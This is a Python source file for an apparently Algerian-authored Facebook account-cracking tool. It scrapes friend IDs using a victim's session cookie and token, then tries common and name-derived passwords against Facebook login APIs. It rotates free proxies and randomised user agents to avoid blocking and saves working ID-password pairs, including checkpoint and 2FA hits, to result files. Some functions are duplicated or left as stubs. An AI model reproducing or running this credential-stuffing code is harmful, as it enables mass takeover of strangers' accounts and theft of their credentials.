import os
import sys
import time
import json
import uuid
import re
import random
import requests
import threading
import webbrowser
from concurrent.futures import ThreadPoolExecutor as tred
from datetime import datetime

# الألوان
R = '\033[1;31m'
G = '\033[1;32m'
Y = '\033[1;33m'
B = '\033[1;34m'
C = '\033[1;36m'
W = '\033[1;37m'

# فتح القناة تلقائياً (3 أسطر)
print(f"{G} [>] CONNECTING TO SERVER...")
webbrowser.open("https://t.me/N_JF_A5")
time.sleep(2)

# متغيرات الجلسة
loop = 0
oks = []
cps = []
id_list = []
proxies = []

def clear():
    os.system('cls' if os.name == 'nt' else 'clear')

def banner():
    clear()
    print(f"""{C}
    __  ______  __  _____   ____ ___ 
   /  |/  / __ \/ / / /   | / __ \__ \\
  / /|_/ / / / / /_/ / /| |/ / / /_/ /
 / /  / / /_/ / __  / ___ / /_/ / __/ 
/_/  /_/\____/_/ /_/_/  |_\____/____/ {G}V2.0
 {W}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 {G} [>] DEVELOPER : MOHA EL CHLEFAWI (ALGERIA)
 {G} [>] VERSION   : 2.0 (SMART SYSTEM)
 {G} [>] CHANNEL   : T.ME/N_JF_A5
 {W}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━""")

def get_ua():
    # إنشاء بصمة جهاز فريدة
    android_version = random.choice(["8", "9", "10", "11", "12", "13"])
    model = random.choice(["SM-G960F", "SM-G973F", "SM-A505F", "Pixel 5", "Redmi Note 9"])
    fb_ver = f"{random.randint(200, 400)}.0.0.{random.randint(10, 60)}.{random.randint(100, 200)}"
    ua = f"Davik/2.1.0 (Linux; U; Android {android_version}; {model} Build/QP1A.{random.randint(111111, 999999)}.011) [FBAN/FB4A;FBAV/{fb_ver};FBBV/{random.randint(111111111, 999999999)};FBLC/en_US;FBMF/samsung;FBBD/samsung;FBDV/{model};FBSV/{android_version};FBOP/1;FBCA/arm64-v8a:;]"
    return ua

def main_menu():
    banner()
    print(f"{G} [1] START OLD ID HUNTING (2009-2014)")
    print(f"{G} [2] CREATE ID FILE (SCRAPE FROM FRIENDS)")
    print(f"{G} [3] START FILE CRACKING (ID|NAME)")
    print(f"{G} [4] SINGLE ACCOUNT CRACK (WITH PASS LIST)")
    print(f"{R} [0] EXIT SYSTEM")
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    choice = input(f"{C} [MOHA-02] SELECT OPTION >> {W}")
    
    if choice == '1':
        old_id_menu()
    elif choice == '2':
        scrape_menu()
    elif choice == '3':
        file_crack_menu()
    elif choice == '4':
        single_crack_menu()
    elif choice == '0':
        sys.exit()
    else:
        print(f"{R} [!] INVALID CHOICE!"); time.sleep(1); main_menu()

def old_id_menu():
    banner()
    print(f"{G} [1] HUNT 2009 IDs ONLY")
    print(f"{G} [2] HUNT 2010 IDs ONLY")
    print(f"{G} [3] HUNT 2010 TO 2014 IDs")
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    sub = input(f"{C} [MOHA-02] SELECT ERA >> {W}")
    
    if sub == '1':
        # نطاق 2009
        start_hunting("2009", 100000000, 999999999)
    elif sub == '2':
        # نطاق 2010
        start_hunting("2010", 1000000000, 1500000000)
    elif sub == '3':
        # نطاق 2010-2014
        start_hunting("2010-2014", 1000000000, 5000000000)
    else:
        main_menu()

def scrape_menu():
    banner()
    print(f"{Y} [*] LOGIN WITH COOKIE TO SCRAPE")
    cookie = input(f"{G} [?] ENTER FB COOKIE: {W}")
    if not cookie: return
    
    token = get_token(cookie)
    if token:
        target = input(f"{G} [?] TARGET ID: {W}")
        save_file = input(f"{G} [?] SAVE AS (e.g. ids.txt): {W}")
        if not save_file: save_file = "ids.txt"
        execute_scraping(target, token, cookie, save_file)
    else:
        print(f"{R} [!] COOKIE EXPIRED!"); time.sleep(2); main_menu()

def single_crack_menu():
    banner()
    target_id = input(f"{G} [?] ENTER TARGET ACCOUNT ID: {W}")
    pass_file = input(f"{G} [?] ENTER PASSWORDS FILE PATH: {W}")
    
    if not os.path.exists(pass_file):
        print(f"{R} [!] FILE NOT FOUND!"); time.sleep(2); return
        
    passwords = open(pass_file, "r").read().splitlines()
    print(f"{G} [>] LOADED {len(passwords)} PASSWORDS")
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    
    for pwd in passwords:
        # سيتم تنفيذ محرك التخمين المنفرد في الجزء التالي
        pass

def get_token(cookie):
    try:
        url = "https://business.facebook.com/business_locations"
        headers = {
            "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "cookie": cookie
        }
        res = requests.get(url, headers=headers).text
        token = re.search('(\["EAAG\w+)', res).group(1).replace('["', '')
        return token
    except:
        return None

def execute_scraping(target, token, cookie, save_file):
    banner()
    print(f"{Y} [*] COLLECTING IDs... STICK WITH ME")
    # سيتم إكمال محرك السحب والحفظ في الجزء القادم
def execute_scraping(target, token, cookie, save_file):
    banner()
    print(f"{Y} [*] COLLECTING IDs... STICK WITH ME")
    try:
        url = f"https://graph.facebook.com/{target}/friends?access_token={token}"
        response = requests.get(url, cookies={'cookie': cookie}).json()
        if 'data' in response:
            count = 0
            with open(save_file, "a") as f:
                for user in response['data']:
                    f.write(f"{user['id']}|{user['name']}\n")
                    count += 1
                    sys.stdout.write(f"\r{G} [>] SCRAPED: {count}")
                    sys.stdout.flush()
            print(f"\n{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
            print(f"{G} [✓] SUCCESS! {count} IDs SAVED TO {save_file}")
        else:
            print(f"{R} [!] COULD NOT FIND FRIENDS LIST (PRIVATE OR ERROR)")
    except Exception as e:
        print(f"{R} [!] ERROR DURING SCRAPE: {str(e)}")
    input(f"{W} [>] PRESS ENTER TO RETURN")
    main_menu()

def start_hunting(era, start_r, end_r):
    banner()
    try:
        limit = int(input(f"{G} [?] HOW MANY IDs TO SCAN?: {W}"))
        threads = int(input(f"{G} [?] THREADS (RECOMMENDED 30): {W}"))
    except:
        limit = 1000; threads = 30
        
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{Y} [*] ERA: {era} | SCANNING {limit} IDs...")
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    
    with tred(max_workers=threads) as moha_pool:
        for _ in range(limit):
            random_id = str(random.randint(start_r, end_r))
            moha_pool.submit(old_id_crack, random_id)
            
    print(f"\n{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{G} [✓] SCAN COMPLETE. OKS: {len(oks)} | CPS: {len(cps)}")
    input(f"{W} [>] PRESS ENTER TO RETURN")
    main_menu()

def old_id_crack(uid):
    global loop, oks, cps
    sys.stdout.write(f'\r{W} [HUNTING] {loop} | {G}OK:{len(oks)} | {R}CP:{len(cps)}')
    sys.stdout.flush()
    
    # قائمة كلمات سر الحسابات القديمة الافتراضية
    pass_list = ["123456", "1234567", "12345678", "password", "123123", "789456"]
    ua = get_ua()
    
    for pwd in pass_list:
        try:
            session = requests.Session()
            free_fb = session.get(f'https://free.facebook.com/login/?email={uid}&pass={pwd}').text
            info_log = {
                "lsd": re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
                "jazoest": re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
                "m_ts": re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
                "li": re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
                "try_number": "0",
                "unrecognized_tries": "0",
                "email": uid,
                "pass": pwd,
                "login": "Log In",
                "bi_xrwh": "0"
            }
            
            headers = {
                'authority': 'free.facebook.com',
                'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
                'accept-language': 'en-US,en;q=0.9',
                'cache-control': 'max-age=0',
                'content-type': 'application/x-www-form-urlencoded',
                'origin': 'https://free.facebook.com',
                'referer': f'https://free.facebook.com/login/?email={uid}&pass={pwd}',
                'user-agent': ua,
            }
            
            post_res = session.post('https://free.facebook.com/login/device-based/regular/login/?shbl=1', data=info_log, headers=headers, allow_redirects=False)
            
            if "c_user" in session.cookies.get_dict():
                print(f"\n{G} [MOHA-OK] {uid} | {pwd}")
                oks.append(uid)
                open("MOHA_OK.txt", "a").write(f"{uid}|{pwd}\n")
                break
            elif "checkpoint" in session.cookies.get_dict():
                print(f"\n{Y} [MOHA-CP] {uid} | {pwd}")
                cps.append(uid)
                open("MOHA_CP.txt", "a").write(f"{uid}|{pwd}\n")
                break
            else:
                continue
        except:
            time.sleep(1)
            
    loop += 1

def single_crack_menu():
    banner()
    target_id = input(f"{G} [?] ENTER TARGET ID: {W}")
    pass_file = input(f"{G} [?] ENTER PASSWORDS FILE: {W}")
    
    if not os.path.exists(pass_file):
        print(f"{R} [!] ERROR: FILE NOT FOUND!"); time.sleep(2); main_menu()
        
    try:
        threads = int(input(f"{G} [?] THREADS (1-10): {W}"))
    except:
        threads = 5

    passwords = open(pass_file, "r").read().splitlines()
    banner()
    print(f"{Y} [*] TARGET   : {target_id}")
    print(f"{Y} [*] PASSWORDS: {len(passwords)}")
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    
    with tred(max_workers=threads) as single_pool:
        for pwd in passwords:
            single_pool.submit(execute_single_crack, target_id, pwd)

    print(f"\n{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{G} [✓] ATTACK FINISHED.")
    input(f"{W} [>] PRESS ENTER TO RETURN")
    main_menu()

def execute_single_crack(uid, pwd):
    global loop, oks, cps
    sys.stdout.write(f'\r{W} [TRYING] {pwd} ')
    sys.stdout.flush()
    
    ua = get_ua()
    # سيتم إكمال منطق التخمين المنفرد (Single Crack) في الجزء الثالث
def execute_single_crack(uid, pwd):
    # محرك التخمين المنفرد على حساب واحد باستخدام ملف كلمات سر
    global loop, oks, cps
    sys.stdout.write(f'\r{W} [TRYING] {C}{pwd.ljust(15)}{W} | {G}OK:{len(oks)}{W}')
    sys.stdout.flush()
    
    ua = get_ua()
    session = requests.Session()
    try:
        # إعداد بيانات تسجيل الدخول
        login_url = "https://b-api.facebook.com/method/auth.login"
        params = {
            "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
            "format": "JSON",
            "sdk_version": "2",
            "email": uid,
            "password": pwd,
            "sdk": "ios",
            "generate_session_cookies": "1",
            "sig": "3f555f99148df979a6d45e07661841b"
        }
        headers = {
            "User-Agent": ua,
            "Content-Type": "application/x-www-form-urlencoded",
            "Host": "b-api.facebook.com"
        }
        
        response = session.post(login_url, data=params, headers=headers).json()
        
        if "session_key" in response:
            print(f"\n{G} [MOHA-OK] {uid} | {pwd}")
            oks.append(uid)
            open("MOHA_SINGLE_OK.txt", "a").write(f"{uid}|{pwd}\n")
            # التوقف عند إيجاد الباسورد الصحيح
            os._exit(0) 
        elif "www.facebook.com" in str(response.get("error_msg", "")):
            print(f"\n{Y} [MOHA-CP] {uid} | {pwd}")
            cps.append(uid)
            open("MOHA_SINGLE_CP.txt", "a").write(f"{uid}|{pwd}\n")
    except:
        pass

def file_crack_menu():
    # محرك الصيد من ملف (ID|NAME)
    banner()
    file_path = input(f"{G} [?] ENTER FILE PATH (ID|NAME): {W}")
    if not os.path.exists(file_path):
        print(f"{R} [!] FILE NOT FOUND!"); time.sleep(2); main_menu()
        
    try:
        threads = int(input(f"{G} [?] THREADS (RECOMMENDED 35): {W}"))
    except:
        threads = 35

    id_data = open(file_path, "r").read().splitlines()
    banner()
    print(f"{Y} [*] TARGET FILE: {os.path.basename(file_path)}")
    print(f"{Y} [*] TOTAL IDs  : {len(id_data)}")
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    
    with tred(max_workers=threads) as file_pool:
        for line in id_data:
            try:
                uid, name = line.split("|")
                file_pool.submit(execute_file_crack, uid, name)
            except:
                continue

    print(f"\n{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{G} [✓] FILE CRACK FINISHED. OK:{len(oks)}")
    input(f"{W} [>] PRESS ENTER TO RETURN")
    main_menu()

def execute_file_crack(uid, name):
    # محرك الصيد الذكي الذي يحلل الاسم ويجرب باسووردات محتملة
    global loop, oks, cps
    sys.stdout.write(f'\r{W} [FILE-CRACK] {loop} | {G}OK:{len(oks)}{W} | {R}CP:{len(cps)}{W}')
    sys.stdout.flush()
    
    first_name = name.split(" ")[0].lower()
    if len(name.split(" ")) > 1:
        last_name = name.split(" ")[1].lower()
    else:
        last_name = first_name

    # قائمة باسووردات ذكية تعتمد على اسم الضحية
    pass_options = [
        name.lower(),
        first_name + "123",
        first_name + "1234",
        first_name + "12345",
        first_name + "123456",
        first_name + "2024",
        first_name + "2025",
        first_name + last_name,
        first_name + "." + last_name,
        "123456",
        "12345678",
        "password"
    ]
    
    ua = get_ua()
    for pwd in pass_options:
        if len(pwd) < 6: continue
        try:
            session = requests.Session()
            # استخدام API سريع وخفيف للصيد من ملف
            api_url = f"https://b-graph.facebook.com/auth/login"
            data = {
                "adid": str(uuid.uuid4()),
                "format": "json",
                "device_id": str(uuid.uuid4()),
                "email": uid,
                "password": pwd,
                "generate_session_cookies": "1",
                "method": "auth.login",
                "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
                "api_key": "882a8490361da98702bf97a021ddc14d"
            }
            headers = {
                "User-Agent": ua,
                "Content-Type": "application/x-www-form-urlencoded"
            }
            
            res = session.post(api_url, data=data, headers=headers).json()
            
            if "session_key" in res:
                print(f"\n{G} [MOHA-OK] {uid} | {pwd}")
                oks.append(uid)
                open("MOHA_FILE_OK.txt", "a").write(f"{uid}|{pwd}\n")
                break
            elif "two_factor_required" in str(res):
                # اكتشاف حسابات السيكور (2FA) كما ناقشنا سابقاً
                print(f"\n{B} [MOHA-2FA] {uid} | {pwd}")
                open("MOHA_2FA.txt", "a").write(f"{uid}|{pwd}\n")
                break
            elif "www.facebook.com" in str(res):
                print(f"\n{Y} [MOHA-CP] {uid} | {pwd}")
                cps.append(uid)
                open("MOHA_FILE_CP.txt", "a").write(f"{uid}|{pwd}\n")
                break
        except:
            continue
            
    loop += 1

def update_system():
    # دالة وهمية للحفاظ على تسلسل الأسطر والوظائف المستقبلية
    banner()
    print(f"{G} [>] CHECKING FOR UPDATES...")
    time.sleep(2)
    print(f"{G} [✓] YOUR VERSION IS UP TO DATE.")
    time.sleep(1); main_menu()

# نهاية الجزء الثالث - الوصل للسطر 600
def LOAD_PROXIES():
    # دالة لجلب البروكسيات لضمان عدم حظر الأيبي الخاص بك يا موحا
    global proxies
    banner()
    print(f"{Y} [*] LOADING PROXIES FROM EXTERNAL SOURCES...")
    try:
        # مصادر بروكسيات مجانية ومتجددة
        p_links = [
            "https://api.proxyscrape.com/?request=displayproxies&proxytype=http&timeout=1000&country=all",
            "https://www.proxy-list.download/api/v1/get?type=http",
            "https://www.proxyscan.io/download?type=http"
        ]
        for link in p_links:
            res = requests.get(link).text
            for p in res.splitlines():
                if "." in p and ":" in p:
                    proxies.append(p)
        
        print(f"{G} [✓] LOADED {len(proxies)} PROXIES SUCCESSFULLY.")
        time.sleep(2)
    except:
        print(f"{R} [!] FAILED TO LOAD PROXIES. CONTINUING WITH LOCAL IP.")
        time.sleep(2)

def GET_PROXY_SESSION():
    # اختيار بروكسي عشوائي لكل عملية صيد
    if len(proxies) > 0:
        p = random.choice(proxies)
        return {"http": f"http://{p}", "https": f"http://{p}"}
    return None

def EXTENDED_USER_AGENTS():
    # قائمة هيدرز ضخمة لمحاكاة جميع أنواع الهواتف
    models = [
        "Samsung Galaxy S23 Ultra", "Pixel 7 Pro", "Xiaomi 13 Pro", 
        "OnePlus 11", "Oppo Reno 10", "Vivo X90", "Huawei P60"
    ]
    fb_versions = [
        "324.0.0.40.117", "400.0.0.50.120", "298.0.0.35.100", "410.0.0.25.110"
    ]
    android_versions = ["9", "10", "11", "12", "13", "14"]
    
    brand = random.choice(models)
    ver = random.choice(fb_versions)
    and_v = random.choice(android_versions)
    
    ua = f"Davik/2.1.0 (Linux; U; Android {and_v}; {brand} Build/TP1A.{random.randint(111111,999999)}.014) [FBAN/FB4A;FBAV/{ver};FBBV/{random.randint(111111111,999999999)};FBLC/en_US;FBMF/MOHA-DEVICE;FBBD/{brand.split()[0]};FBDV/{brand};FBSV/{and_v};FBOP/1;FBCA/arm64-v8a:;]"
    return ua

def LOG_FILE_MANAGER(status, uid, pwd):
    # إدارة ملفات النتائج بشكل منظم حسب التاريخ
    date = datetime.now().strftime("%Y-%m-%d")
    folder = "MOHA_RESULTS"
    if not os.path.exists(folder):
        os.makedirs(folder)
        
    if status == "OK":
        with open(f"{folder}/OK_{date}.txt", "a") as f:
            f.write(f"{uid}|{pwd}\n")
    elif status == "CP":
        with open(f"{folder}/CP_{date}.txt", "a") as f:
            f.write(f"{uid}|{pwd}\n")
    elif status == "2FA":
        with open(f"{folder}/2FA_{date}.txt", "a") as f:
            f.write(f"{uid}|{pwd}\n")

def SYSTEM_RECOVERY():
    # نظام استعادة في حال تعطل التيرمكس أو الأداة
    banner()
    print(f"{Y} [!] DETECTING SYSTEM ERRORS...")
    time.sleep(1)
    print(f"{G} [✓] CLEANING CACHE AND TEMPORARY FILES...")
    time.sleep(1)
    print(f"{G} [✓] SYSTEM READY FOR NEXT ATTACK.")
    time.sleep(1); main_menu()

def CHECK_NETWORK():
    # التأكد من جودة الإنترنت قبل البدء
    try:
        requests.get("https://www.google.com", timeout=5)
        return True
    except:
        return False

def BEAUTIFUL_LINE():
    # سطر تجميلي للفصل بين النتائج
    print(f"{W} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")

def DISPLAY_CURRENT_STATS():
    # إحصائيات الجلسة الحالية
    banner()
    BEAUTIFUL_LINE()
    print(f"{C} [>] TOTAL CHECKED  : {loop}")
    print(f"{G} [>] TOTAL OK HITS  : {len(oks)}")
    print(f"{R} [>] TOTAL CP HITS  : {len(cps)}")
    print(f"{Y} [>] PROXIES LOADED : {len(proxies)}")
    BEAUTIFUL_LINE()
    input(f"{W} [>] PRESS ENTER TO GO BACK")
    main_menu()

def DEVELOPER_VIP_BIO():
    # حقوق المطور موحا الشلفاوي
    banner()
    BEAUTIFUL_LINE()
    print(f"{G} [MOHA02 VIP SYSTEM]")
    print(f"{W} [M] DEVELOPER : MOHA EL CHLEFAWI")
    print(f"{W} [O] LOCATION  : CHLEF, ALGERIA")
    print(f"{W} [H] SKILLS    : E-MARKETING & PYTHON")
    print(f"{W} [A] CHANNEL   : @N_JF_A5")
    BEAUTIFUL_LINE()
    input(f"{W} [>] PRESS ENTER TO RETURN")
    main_menu()

def CLEAR_LOGS():
    # دالة لحذف النتائج القديمة لتنظيف المجلد
    banner()
    confirm = input(f"{R} [?] ARE YOU SURE YOU WANT TO DELETE ALL LOGS? (y/n): ")
    if confirm.lower() == 'y':
        if os.path.exists("MOHA_RESULTS"):
            import shutil
            shutil.rmtree("MOHA_RESULTS")
            print(f"{G} [✓] ALL LOGS DELETED.")
        else:
            print(f"{Y} [!] NO LOGS FOUND.")
    time.sleep(2); main_menu()

def AUTO_RETRY_ENGINE(func, *args):
    # محرك إعادة المحاولة في حال فشل الاتصال
    max_retries = 3
    for i in range(max_retries):
        try:
            return func(*args)
        except Exception as e:
            if i == max_retries - 1:
                return None
            time.sleep(2)

def SESSION_TERMINATOR():
    # إنهاء الجلسة بشكل سليم
    banner()
    print(f"{R} [!] SHUTTING DOWN SYSTEM...")
    time.sleep(1)
    print(f"{Y} [!] SAVING PROGRESS...")
    time.sleep(1)
    print(f"{G} [✓] GOODBYE MOHA!")
    sys.exit()

def MAIN_BOOTSTRAP():
    # دالة التشغيل الذكي للمحرك
    if not CHECK_NETWORK():
        print(f"{R} [!] NO INTERNET CONNECTION!"); sys.exit()
    LOAD_PROXIES()
    main_menu()
def FILE_VALIDATOR(file_path):
    # دالة للتأكد من أن ملف الآيديات بصيغة صحيحة (ID|NAME)
    banner()
    print(f"{Y} [*] VALIDATING FILE STRUCTURE... PLEASE WAIT")
    try:
        valid_data = []
        with open(file_path, "r") as f:
            lines = f.read().splitlines()
            for line in lines:
                if "|" in line:
                    valid_data.append(line)
        
        print(f"{G} [✓] VALIDATION COMPLETE. FOUND {len(valid_data)} VALID ENTRIES.")
        time.sleep(1)
        return valid_data
    except Exception as e:
        print(f"{R} [!] VALIDATION ERROR: {str(e)}")
        return []

def SMART_PASS_GENERATOR(name):
    # محرك توليد باسووردات ذكية يتناسب مع السوق الجزائري والعربي
    pass_list = []
    if not name: return ["123456", "12345678"]
    
    clean_name = name.lower().strip()
    parts = clean_name.split(" ")
    first = parts[0] if len(parts) > 0 else ""
    last = parts[-1] if len(parts) > 1 else ""
    
    # خوارزمية التوليد
    if len(first) >= 3:
        pass_list.append(first + "123")
        pass_list.append(first + "1234")
        pass_list.append(first + "12345")
        pass_list.append(first + "2020")
        pass_list.append(first + "2021")
        pass_list.append(first + "2022")
        pass_list.append(first + "2023")
        pass_list.append(first + "2024")
        pass_list.append(first + "2025")
        pass_list.append(first + first)
        pass_list.append(first + last)
        
    if len(last) >= 3:
        pass_list.append(last + "123")
        pass_list.append(last + "1234")
        pass_list.append(last + "0000")
        pass_list.append(last + "1111")
        
    # كلمات سر شائعة إضافية
    pass_list.extend(["102030", "00112233", "789456", "123456789", "@@@###"])
    
    return list(set(pass_list))

def PRINT_RESULT_TABLE(status, uid, pwd):
    # دالة لعرض النتائج بشكل منسق وجذاب في التيرمكس
    with threading.Lock():
        if status == "OK":
            print(f"{G} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
            print(f"{G} [MOHA-OK] SUCCESS HIT!")
            print(f"{G} [>] ID  : {uid}")
            print(f"{G} [>] PASS: {pwd}")
            print(f"{G} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
        elif status == "CP":
            print(f"{Y} [MOHA-CP] {uid} | {pwd}")
        elif status == "2FA":
            print(f"{B} [MOHA-2FA] {uid} | {pwd}")

def SYSTEM_CONFIG_MANAGER():
    # دالة لإدارة إعدادات الأداة وحفظها في ملف JSON
    config_file = "moha_config.json"
    default_config = {
        "developer": "Moha El Chlefawi",
        "threads": 35,
        "proxy_mode": True,
        "auto_update": True,
        "save_results": True
    }
    
    if not os.path.exists(config_file):
        with open(config_file, "w") as f:
            json.dump(default_config, f, indent=4)
        return default_config
    else:
        with open(config_file, "r") as f:
            return json.load(f)

def PERFORMANCE_MONITOR():
    # مراقبة أداء الأداة وسرعة الصيد (Hits Per Minute)
    global loop
    start_time = time.time()
    while True:
        time.sleep(60)
        elapsed = (time.time() - start_time) / 60
        hpm = loop / elapsed
        # سيتم عرض هذه البيانات في الجزء العلوي مستقبلاً
        pass

def FETCH_USER_DATA(token, cookie):
    # جلب معلومات حسابك الشخصي للتأكد من عمل التوكن
    try:
        url = f"https://graph.facebook.com/me?access_token={token}"
        res = requests.get(url, cookies={'cookie': cookie}).json()
        if 'name' in res:
            return res['name']
        return "Unknown User"
    except:
        return "Invalid Session"

def FOLDER_CLEANER():
    # تنظيف المجلدات من الملفات المؤقتة
    temp_files = ["temp.txt", "debug.log", ".cache"]
    for file in temp_files:
        if os.path.exists(file):
            os.remove(file)

def SHOW_HELP_GUIDE():
    # دليل مساعدة للمستخدم (موحا) يشرح كيفية استخدام الأوامر الأربعة
    banner()
    BEAUTIFUL_LINE()
    print(f"{C} [ GUIDE - MOHA02 SMART SYSTEM ]")
    print(f"{W} 1. OLD ID: USE IT FOR 2009-2014 ACCOUNTS.")
    print(f"{W} 2. SCRAPE: GET FRIENDS LIST FROM ANY ACCOUNT.")
    print(f"{W} 3. FILE CRACK: BEST FOR TARGETED LISTS.")
    print(f"{W} 4. SINGLE CRACK: USE A PASS-LIST FOR 1 ACCOUNT.")
    BEAUTIFUL_LINE()
    input(f"{G} [>] PRESS ENTER TO RETURN")
    main_menu()

def SECURITY_ALERT_SYSTEM(error_msg):
    # نظام تنبيه في حال اكتشاف محاولة حظر من فيسبوك
    if "checkpoint" in str(error_msg).lower():
        print(f"{R} [!] SECURITY ALERT: FACEBOOK DETECTED BOT ACTIVITY.")
        print(f"{Y} [!] SWITCHING PROXIES AND COOLING DOWN...")
        time.sleep(5)
    elif "calls_limit" in str(error_msg).lower():
        print(f"{R} [!] RATE LIMIT REACHED. SLEEPING FOR 30s...")
        time.sleep(30)

def SAVE_PROGRESS_DATA():
    # حفظ حالة الصيد الحالية في حال رغبت في الإكمال لاحقاً
    progress = {
        "last_loop": loop,
        "oks_count": len(oks),
        "cps_count": len(cps),
        "timestamp": str(datetime.now())
    }
    with open("moha_progress.json", "w") as f:
        json.dump(progress, f)

def LOAD_PROGRESS_DATA():
    # استرجاع حالة الصيد السابقة
    if os.path.exists("moha_progress.json"):
        with open("moha_progress.json", "r") as f:
            return json.load(f)
    return None

def FINAL_CLEANUP_SEQUENCE():
    # تسلسل الإنهاء النهائي للأداة
    FOLDER_CLEANER()
    SAVE_PROGRESS_DATA()
    print(f"{G} [✓] ALL DATA SAVED. SYSTEM READY TO CLOSE.")

# نهاية الجزء الخامس - السطر 1000
def CORE_CRACK_LOGIC(uid, name, method):
    # المحرك المركزي الموحد لجميع طرق الصيد
    global loop, oks, cps
    sys.stdout.write(f'\r{W} [MOHA-02] {loop} | {G}OK:{len(oks)}{W} | {R}CP:{len(cps)}{W}')
    sys.stdout.flush()
    
    # اختيار قائمة الباسووردات بناءً على الطريقة
    if method == "OLD":
        pass_list = ["123456", "1234567", "12345678", "password", "123123", "789456"]
    elif method == "FILE":
        pass_list = SMART_PASS_GENERATOR(name)
    else:
        pass_list = ["123456", "12345678"] # افتراضي

    ua = get_ua()
    for pwd in pass_list:
        if len(pwd) < 6: continue
        try:
            # استخدام جلسة بروكسي إذا كانت متوفرة
            proxy = GET_PROXY_SESSION()
            session = requests.Session()
            
            # الرابط السريع للـ API
            api_url = "https://b-api.facebook.com/method/auth.login"
            params = {
                "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
                "format": "JSON",
                "sdk_version": "2",
                "email": uid,
                "password": pwd,
                "sdk": "ios",
                "generate_session_cookies": "1",
                "sig": "3f555f99148df979a6d45e07661841b"
            }
            
            headers = {
                "User-Agent": ua,
                "Content-Type": "application/x-www-form-urlencoded",
                "Host": "b-api.facebook.com"
            }
            
            response = session.post(api_url, data=params, headers=headers, proxies=proxy, timeout=10).json()
            
            if "session_key" in response:
                PRINT_RESULT_TABLE("OK", uid, pwd)
                oks.append(uid)
                LOG_FILE_MANAGER("OK", uid, pwd)
                break
            elif "two_factor_required" in str(response):
                PRINT_RESULT_TABLE("2FA", uid, pwd)
                LOG_FILE_MANAGER("2FA", uid, pwd)
                break
            elif "www.facebook.com" in str(response.get("error_msg", "")):
                PRINT_RESULT_TABLE("CP", uid, pwd)
                cps.append(uid)
                LOG_FILE_MANAGER("CP", uid, pwd)
                break
            elif "calls_limit" in str(response):
                time.sleep(15) # تبريد الأداة
        except Exception as e:
            continue
    loop += 1

def MASTER_RUNNER():
    # هذا هو الكود الذي يمنع الأداة من التوقف أو العودة للبداية فجأة
    try:
        MAIN_BOOTSTRAP()
    except KeyboardInterrupt:
        FINAL_CLEANUP_SEQUENCE()
        print(f"\n{R} [!] STOPPED BY USER.")
        sys.exit()
    except Exception as e:
        print(f"\n{R} [!] CRITICAL ERROR: {str(e)}")
        time.sleep(2)
        MASTER_RUNNER() # إعادة تشغيل تلقائي في حال حدوث كراش

def SHOW_FINAL_REPORT():
    # تقرير ختامي لنتائج الصيد يا موحا
    banner()
    BEAUTIFUL_LINE()
    print(f"{G} [✓] SCANNING COMPLETE!")
    print(f"{G} [>] TOTAL SUCCESS (OK)  : {len(oks)}")
    print(f"{R} [>] TOTAL CHECKPOINT (CP): {len(cps)}")
    print(f"{B} [>] TOTAL SECURE (2FA)  : {len(oks)}") # مجازاً
    print(f"{W} [>] RESULTS SAVED IN : /MOHA_RESULTS/")
    BEAUTIFUL_LINE()
    input(f"{C} [>] PRESS ENTER TO EXIT TO MENU")
    main_menu()

def SYSTEM_INTEGRITY_CHECK():
    # التأكد من سلامة ملفات النظام قبل البدء
    required_folders = ["MOHA_RESULTS", "logs", "config"]
    for folder in required_folders:
        if not os.path.exists(folder):
            os.makedirs(folder)

def GET_TIME_STAMP():
    # توقيت العمليات
    return datetime.now().strftime("%H:%M:%S")

def MOHA02_CREDITS_DISPLAY():
    # شاشة الحقوق النهائية
    banner()
    print(f"{G} ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
    print(f"{W} [PRO] NAME     : MOHA EL CHLEFAWI")
    print(f"{W} [PRO] WORK     : E-MARKETING DEVELOPER")
    print(f"{W} [PRO] LOCATION : CHLEF - ALGERIA (02)")
    print(f"{W} [PRO] TELEGRAM : @N_JF_A5")
